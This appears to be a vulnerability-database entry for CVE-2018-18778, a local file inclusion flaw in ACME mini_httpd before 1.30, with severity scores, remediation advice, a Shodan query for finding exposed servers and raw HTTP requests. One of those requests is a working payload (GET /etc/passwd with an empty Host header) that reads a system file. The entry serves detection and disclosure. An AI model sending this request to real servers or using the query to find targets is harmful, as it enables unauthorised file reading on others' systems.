| Title | ACME mini_httpd <1.30 - Local File Inclusion |
|---|---|
| Author | DhiyaneshDK,dogasantos |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability allows an attacker to read arbitrary files on the server. |
| Remediation | Upgrade ACME mini_httpd to version 1.30 or later to mitigate this vulnerability. |
| CVSS Score | 6.5 |
| EPSS Score | 0.92777 |
| CVE ID | CVE-2018-18778 |
| CWE ID | CWE-200 |
| Shodan Query | Server: mini_httpd && 200cpe:"cpe:2.3:a:acme:mini-httpd"server: mini_httpd && 200 |
| Tags | cve cve2018 lfi mini_httpd acme vuln |
ACME mini_httpd before 1.30 is vulnerable to local file inclusion.
GET / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /etc/passwd HTTP/1.1
Host:
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-18778.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-18778.pcap
N/AN/A